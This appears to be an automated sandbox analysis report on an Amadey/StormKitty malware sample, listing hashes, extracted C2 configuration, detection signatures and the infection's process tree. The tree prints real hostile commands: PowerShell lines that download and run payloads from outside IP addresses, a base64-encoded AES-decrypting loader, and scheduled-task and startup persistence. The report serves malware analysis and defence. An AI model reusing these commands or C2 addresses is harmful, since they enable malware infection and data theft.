Analysis

  • max time kernel
    113s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    07/03/2025, 06:54

General

  • Target

    bced8cc13d6bccdb3f54e578f084b0d31fb987022d2c5e582f3ba31bb77370f9.exe

  • Size

    938KB

  • MD5

    29dbe0a1208dfedac751f580a83fca87

  • SHA1

    5dba16b31a81c541525a169fd76426e7ae9a04fd

  • SHA256

    bced8cc13d6bccdb3f54e578f084b0d31fb987022d2c5e582f3ba31bb77370f9

  • SHA512

    153ada7a91e0c7841a8f07b43731d07b94307620ee3d45552f1d3c1bcae34b0b29b282bed35a6264a1b2d2d4e9f7fe076e57874a45480232fbd11aac91617d39

  • SSDEEP

    24576:rqDEvCTbMWu7rQYlBQcBiT6rprG8a0gu:rTvC/MTQYxsWR7a0g

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 1 IoCs
  • Stormkitty family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Powershell Invoke Web Request.

  • Downloads MZ/PE file 8 IoCs
  • Checks BIOS information in registry 2 TTPs 6 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 3 IoCs
  • Executes dropped EXE 15 IoCs
  • Identifies Wine through registry keys 2 TTPs 3 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 48 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 8 IoCs
  • Detects Pyinstaller 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 7 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 38 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 42 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 10 IoCs
  • Suspicious use of FindShellTrayWindow 7 IoCs
  • Suspicious use of SendNotifyMessage 6 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1152
      • C:\Users\Admin\AppData\Local\Temp\bced8cc13d6bccdb3f54e578f084b0d31fb987022d2c5e582f3ba31bb77370f9.exe
        "C:\Users\Admin\AppData\Local\Temp\bced8cc13d6bccdb3f54e578f084b0d31fb987022d2c5e582f3ba31bb77370f9.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:1632
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c schtasks /create /tn TZEwnmaJpGH /tr "mshta C:\Users\Admin\AppData\Local\Temp\IOX249nFz.hta" /sc minute /mo 25 /ru "Admin" /f
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1212
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /tn TZEwnmaJpGH /tr "mshta C:\Users\Admin\AppData\Local\Temp\IOX249nFz.hta" /sc minute /mo 25 /ru "Admin" /f
            4⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:1592
        • C:\Windows\SysWOW64\mshta.exe
          mshta C:\Users\Admin\AppData\Local\Temp\IOX249nFz.hta
          3⤵
          • System Location Discovery: System Language Discovery
          • Modifies Internet Explorer settings
          • Suspicious use of WriteProcessMemory
          PID:352
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'X4ZFS558DGPHJTROJ0TCUGIVK6FDX5XW.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
            4⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Downloads MZ/PE file
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3064
            • C:\Users\Admin\AppData\Local\TempX4ZFS558DGPHJTROJ0TCUGIVK6FDX5XW.EXE
              "C:\Users\Admin\AppData\Local\TempX4ZFS558DGPHJTROJ0TCUGIVK6FDX5XW.EXE"
              5⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Loads dropped DLL
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Drops file in Windows directory
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of WriteProcessMemory
              PID:2904
              • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
                6⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Downloads MZ/PE file
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Loads dropped DLL
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:1848
                • C:\Users\Admin\AppData\Local\Temp\10111840101\HmngBpR.exe
                  "C:\Users\Admin\AppData\Local\Temp\10111840101\HmngBpR.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of SetWindowsHookEx
                  • Suspicious use of WriteProcessMemory
                  PID:1444
                  • C:\Users\Admin\AppData\Local\Temp\KM_daemon\SplashWin.exe
                    C:\Users\Admin\AppData\Local\Temp\KM_daemon\SplashWin.exe
                    8⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of WriteProcessMemory
                    PID:408
                    • C:\Users\Admin\AppData\Roaming\KM_daemon\SplashWin.exe
                      C:\Users\Admin\AppData\Roaming\KM_daemon\SplashWin.exe
                      9⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of SetThreadContext
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious behavior: MapViewOfSection
                      • Suspicious use of WriteProcessMemory
                      PID:1552
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\SysWOW64\cmd.exe
                        10⤵
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious behavior: MapViewOfSection
                        PID:1476
                        • C:\Windows\SysWOW64\explorer.exe
                          C:\Windows\SysWOW64\explorer.exe
                          11⤵
                          • System Location Discovery: System Language Discovery
                          PID:2344
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 2344 -s 256
                            12⤵
                            • Program crash
                            PID:1804
                • C:\Users\Admin\AppData\Local\Temp\10112790101\ADFoyxP.exe
                  "C:\Users\Admin\AppData\Local\Temp\10112790101\ADFoyxP.exe"
                  7⤵
                  • Executes dropped EXE
                  • Drops file in Windows directory
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:2212
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\system32\cmd.exe" /c expand Go.pub Go.pub.bat & Go.pub.bat
                    8⤵
                    • Loads dropped DLL
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of WriteProcessMemory
                    PID:2544
                    • C:\Windows\SysWOW64\expand.exe
                      expand Go.pub Go.pub.bat
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:2076
                    • C:\Windows\SysWOW64\tasklist.exe
                      tasklist
                      9⤵
                      • Enumerates processes with tasklist
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1784
                    • C:\Windows\SysWOW64\findstr.exe
                      findstr /I "opssvc wrsa"
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:1540
                    • C:\Windows\SysWOW64\tasklist.exe
                      tasklist
                      9⤵
                      • Enumerates processes with tasklist
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1216
                    • C:\Windows\SysWOW64\findstr.exe
                      findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:2720
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c md 353090
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:2580
                    • C:\Windows\SysWOW64\extrac32.exe
                      extrac32 /Y /E Really.pub
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:872
                    • C:\Windows\SysWOW64\findstr.exe
                      findstr /V "posted" Good
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:2912
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c copy /b 353090\Seat.com + Pf + Somewhere + Volumes + Commission + Lane + Hit + Strong + Copied + Wearing + Acquire 353090\Seat.com
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:2388
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c copy /b ..\Maintains.pub + ..\Legislation.pub + ..\Blood.pub + ..\Document.pub + ..\Breaks.pub + ..\Both.pub + ..\Explicitly.pub + ..\Governor.pub + ..\Bull.pub + ..\Comparison.pub + ..\Performing.pub + ..\Gate.pub + ..\Republican.pub + ..\Reverse.pub + ..\Thousand.pub + ..\Apartments.pub + ..\Swingers.pub + ..\Urban.pub + ..\Robert.pub + ..\Regulation.pub + ..\Confusion.pub + ..\Listening.pub + ..\Generating.pub + ..\Argentina.pub + ..\Amenities.pub + ..\Vacation.pub + ..\Vampire.pub + ..\Trademarks.pub + ..\Distinguished.pub + ..\Silly.pub + ..\Hell.pub + ..\Worcester.pub + ..\Concept.pub + ..\Enlarge.pub + ..\Preference.pub + ..\Poem.pub m
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:1980
                    • C:\Users\Admin\AppData\Local\Temp\353090\Seat.com
                      Seat.com m
                      9⤵
                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of SendNotifyMessage
                      PID:2652
                      • C:\Users\Admin\AppData\Local\Temp\353090\RegAsm.exe
                        C:\Users\Admin\AppData\Local\Temp\353090\RegAsm.exe
                        10⤵
                          PID:1440
                      • C:\Windows\SysWOW64\choice.exe
                        choice /d y /t 5
                        9⤵
                        • System Location Discovery: System Language Discovery
                        PID:2668
                  • C:\Users\Admin\AppData\Local\Temp\10114440101\9hUDDVk.exe
                    "C:\Users\Admin\AppData\Local\Temp\10114440101\9hUDDVk.exe"
                    7⤵
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    PID:2824
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 2824 -s 832
                      8⤵
                      • Loads dropped DLL
                      • Program crash
                      PID:2444
                  • C:\Users\Admin\AppData\Local\Temp\10114630101\pwHxMTy.exe
                    "C:\Users\Admin\AppData\Local\Temp\10114630101\pwHxMTy.exe"
                    7⤵
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    PID:408
                  • C:\Users\Admin\AppData\Local\Temp\10115790101\T0QdO0l.exe
                    "C:\Users\Admin\AppData\Local\Temp\10115790101\T0QdO0l.exe"
                    7⤵
                    • Drops startup file
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2476
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 2476 -s 644
                      8⤵
                      • Loads dropped DLL
                      • Program crash
                      PID:2432
                  • C:\Users\Admin\AppData\Local\Temp\10118750101\culBzEZ.exe
                    "C:\Users\Admin\AppData\Local\Temp\10118750101\culBzEZ.exe"
                    7⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Loads dropped DLL
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    PID:1512
                    • C:\Windows\SysWOW64\WScript.exe
                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Lappy.A.vbs"
                      8⤵
                      • System Location Discovery: System Language Discovery
                      PID:2744
                    • C:\Users\Admin\AppData\Local\Temp\Build.exe
                      "C:\Users\Admin\AppData\Local\Temp\Build.exe"
                      8⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2828
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 2828 -s 984
                        9⤵
                        • Loads dropped DLL
                        • Program crash
                        PID:1840
                  • C:\Users\Admin\AppData\Local\Temp\10118770101\jdehFMM.exe
                    "C:\Users\Admin\AppData\Local\Temp\10118770101\jdehFMM.exe"
                    7⤵
                    • Executes dropped EXE
                    PID:4344
                    • C:\Windows\system32\cmd.exe
                      "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\BE21.tmp\BE22.tmp\BE23.bat C:\Users\Admin\AppData\Local\Temp\10118770101\jdehFMM.exe"
                      8⤵
                        PID:4092
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
                          9⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:296
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"
                            10⤵
                            • Command and Scripting Interpreter: PowerShell
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2572
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10119311121\1b3yDoR.cmd"
                      7⤵
                      • System Location Discovery: System Language Discovery
                      PID:584
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10119311121\1b3yDoR.cmd"
                        8⤵
                        • System Location Discovery: System Language Discovery
                        PID:1764
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskZmZ0bnogPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJGZmdG56KSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRmZnRueiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRmZnRueiwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkZmZ0bnoiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gdHp6a2ooJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ25ZaHg4TTNkRGdlZXV5R0w4TmpHdUhVaSszUzJid1oxamJNVXB2SkVJRUk9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ2diNktFYTlLWEVoNHl3dDZYNURoK3c9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb3Vhb24oJHBhcmFtX3Zhcil7CSRmZGJ2dT1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkdHpmZG89TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkaW5haXI9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgkZmRidnUsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJGluYWlyLkNvcHlUbygkdHpmZG8pOwkkaW5haXIuRGlzcG9zZSgpOwkkZmRidnUuRGlzcG9zZSgpOwkkdHpmZG8uRGlzcG9zZSgpOwkkdHpmZG8uVG9BcnJheSgpO31mdW5jdGlvbiBudmNjdCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHJub2p3PVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCdbLTEuLi00XSAtam9pbiAnJykoW2J5dGVbXV0kcGFyYW1fdmFyKTsJJHd3bnNsPSRybm9qdy5FbnRyeVBvaW50Owkkd3duc2wuSW52b2tlKCRudWxsLCAkcGFyYW0yX3Zhcik7fSRob3N0LlVJLlJhd1VJLldpbmRvd1RpdGxlID0gJGZmdG56OyRhaGJveD1bU3lzdGVtLklPLkZpbGVdOjooJ3R4ZVRsbEFkYWVSJ1stMS4uLTExXSAtam9pbiAnJykoJGZmdG56KS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkYmhrIGluICRhaGJveCkgewlpZiAoJGJoay5TdGFydHNXaXRoKCc6OiAnKSkJewkJJG9nY3lrPSRiaGsuU3Vic3RyaW5nKDMpOwkJYnJlYWs7CX19JGdvYmp1PVtzdHJpbmdbXV0kb2djeWsuU3BsaXQoJ1wnKTskcnprbnk9b3Vhb24gKHR6emtqIChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGdvYmp1WzBdKSkpOyRraHhteD1vdWFvbiAodHp6a2ogKFtDb252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkZ29ianVbMV0pKSk7bnZjY3QgJHJ6a255ICRudWxsO252Y2N0ICRraHhteCAoLFtzdHJpbmdbXV0gKCclKicpKTs=')) | Invoke-Expression"
                          9⤵
                          • Command and Scripting Interpreter: PowerShell
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1988
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\10119590141\ogfNbjS.ps1"
                      7⤵
                      • Command and Scripting Interpreter: PowerShell
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:548
                    • C:\Users\Admin\AppData\Local\Temp\10119880101\6sbmSAg.exe
                      "C:\Users\Admin\AppData\Local\Temp\10119880101\6sbmSAg.exe"
                      7⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      PID:4332
                      • C:\Users\Admin\AppData\Local\Temp\10119880101\6sbmSAg.exe
                        "C:\Users\Admin\AppData\Local\Temp\10119880101\6sbmSAg.exe"
                        8⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        PID:2032
                    • C:\Users\Admin\AppData\Local\Temp\10121660101\amnew.exe
                      "C:\Users\Admin\AppData\Local\Temp\10121660101\amnew.exe"
                      7⤵
                        PID:4752
                        • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                          "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
                          8⤵
                            PID:4824
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\10122100141\ogfNbjS.ps1"
                          7⤵
                          • Command and Scripting Interpreter: PowerShell
                          PID:4916
                        • C:\Users\Admin\AppData\Local\Temp\10122110101\zY9sqWs.exe
                          "C:\Users\Admin\AppData\Local\Temp\10122110101\zY9sqWs.exe"
                          7⤵
                            PID:5088
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 5088 -s 1016
                              8⤵
                              • Program crash
                              PID:3240
                          • C:\Users\Admin\AppData\Local\Temp\10122120101\pwHxMTy.exe
                            "C:\Users\Admin\AppData\Local\Temp\10122120101\pwHxMTy.exe"
                            7⤵
                              PID:892
                            • C:\Users\Admin\AppData\Local\Temp\10122130101\MCxU5Fj.exe
                              "C:\Users\Admin\AppData\Local\Temp\10122130101\MCxU5Fj.exe"
                              7⤵
                                PID:3104
                                • C:\Users\Admin\AppData\Local\Temp\10122130101\MCxU5Fj.exe
                                  "C:\Users\Admin\AppData\Local\Temp\10122130101\MCxU5Fj.exe"
                                  8⤵
                                    PID:3148
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3148 -s 1032
                                      9⤵
                                      • Program crash
                                      PID:3828
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3104 -s 508
                                    8⤵
                                    • Program crash
                                    PID:3212
                                • C:\Users\Admin\AppData\Local\Temp\10122170101\ADFoyxP.exe
                                  "C:\Users\Admin\AppData\Local\Temp\10122170101\ADFoyxP.exe"
                                  7⤵
                                    PID:3424
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\system32\cmd.exe" /c expand Go.pub Go.pub.bat & Go.pub.bat
                                      8⤵
                                        PID:3660
                                        • C:\Windows\SysWOW64\expand.exe
                                          expand Go.pub Go.pub.bat
                                          9⤵
                                            PID:3696
                                          • C:\Windows\SysWOW64\tasklist.exe
                                            tasklist
                                            9⤵
                                            • Enumerates processes with tasklist
                                            PID:3720
                                          • C:\Windows\SysWOW64\findstr.exe
                                            findstr /I "opssvc wrsa"
                                            9⤵
                                              PID:3728
                                            • C:\Windows\SysWOW64\tasklist.exe
                                              tasklist
                                              9⤵
                                              • Enumerates processes with tasklist
                                              PID:3504
                                            • C:\Windows\SysWOW64\findstr.exe
                                              findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"
                                              9⤵
                                                PID:3512
                                          • C:\Users\Admin\AppData\Local\Temp\10122180101\9hUDDVk.exe
                                            "C:\Users\Admin\AppData\Local\Temp\10122180101\9hUDDVk.exe"
                                            7⤵
                                              PID:3948
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\Admin\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F
                                    2⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:2700
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\Admin\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:296
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & echo URL="C:\Users\Admin\AppData\Local\TradeSecure Innovations\TradeHub.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & exit
                                    2⤵
                                    • Drops startup file
                                    • System Location Discovery: System Language Discovery
                                    PID:3004

                                Network

                                MITRE ATT&CK Enterprise v15

                                Replay Monitor

                                Loading Replay Monitor...

                                Downloads

                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

                                  Filesize

                                  71KB

                                  MD5

                                  83142242e97b8953c386f988aa694e4a

                                  SHA1

                                  833ed12fc15b356136dcdd27c61a50f59c5c7d50

                                  SHA256

                                  d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755

                                  SHA512

                                  bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10

                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                  Filesize

                                  344B

                                  MD5

